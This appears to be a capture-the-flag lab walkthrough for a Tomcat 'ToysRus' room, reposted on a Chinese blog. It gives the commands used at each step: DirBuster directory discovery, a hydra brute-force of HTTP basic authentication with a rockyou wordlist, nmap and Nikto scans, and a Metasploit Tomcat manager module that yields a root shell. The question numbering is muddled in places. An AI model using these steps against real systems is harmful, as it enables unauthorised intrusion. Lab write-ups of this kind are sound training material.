[Task 1] ToysRus

  1. What directory can you find, that begins with a g?
    - Open DirBuster
    - input target url and wordlist
    - Click Start and wait

open /guidelines/


2. Whose name can you find from this directory? Bob

3. What directory has basic authentication? Protected

4. What is bob’s password to the protected part of the website?
I used hydra to crack the password with http-get form

hydra -l bob -P /root/Desktop/rockyou.txt -f http-get /protected/

Try to login with credential

5. What other port that serves a webs service is open on the machine?
Find open port

nmap -Pn

Find services

nmap -sV -T 4

Tomcat port is 1234

6. Going to the service running on that port, what is the name and version of the software?

nmap -sV -A -T 4

Apache Tomcat/7.0.88

Also access port 1234

7. Use Nikto with the credentials you have found and scan the /manager/html directory on the port found above.
How many documentation files did Nikto identify?

Click Manager App

Try with credential

Let’s scan the site

nikto -h -id bob:<password>

There’re 5 documents.

10. Where is Ektron CMS version information found?

9. What version of Apache-Coyote is this service using? 1.1

10. Use Metasploit to exploit the service and get a shell on the system.
What user did you get a shell as?

search tomcat

There’re 3 exploits that I can use.

I tried to use #13 and #14, but it didn’t work. I’ll skip to #15.

use 15
show options
set HttpPassword <password>
set HttpUsername bob
set RHOSTS <ip>
set RPORT 1234

Let’s get shell


What user did you get a shell as? root

10. What text is in the file /root/flag.txt

cd /root
cat flag.txt


本文由 泓源视野 作者:admin 发表,其版权均为 泓源视野 所有,文章内容系作者个人观点,不代表 泓源视野 对观点赞同或支持。如需转载,请注明文章来源。


Protected with IP Blacklist CloudIP Blacklist Cloud
您是第8232178位访客, 您的IP是:[]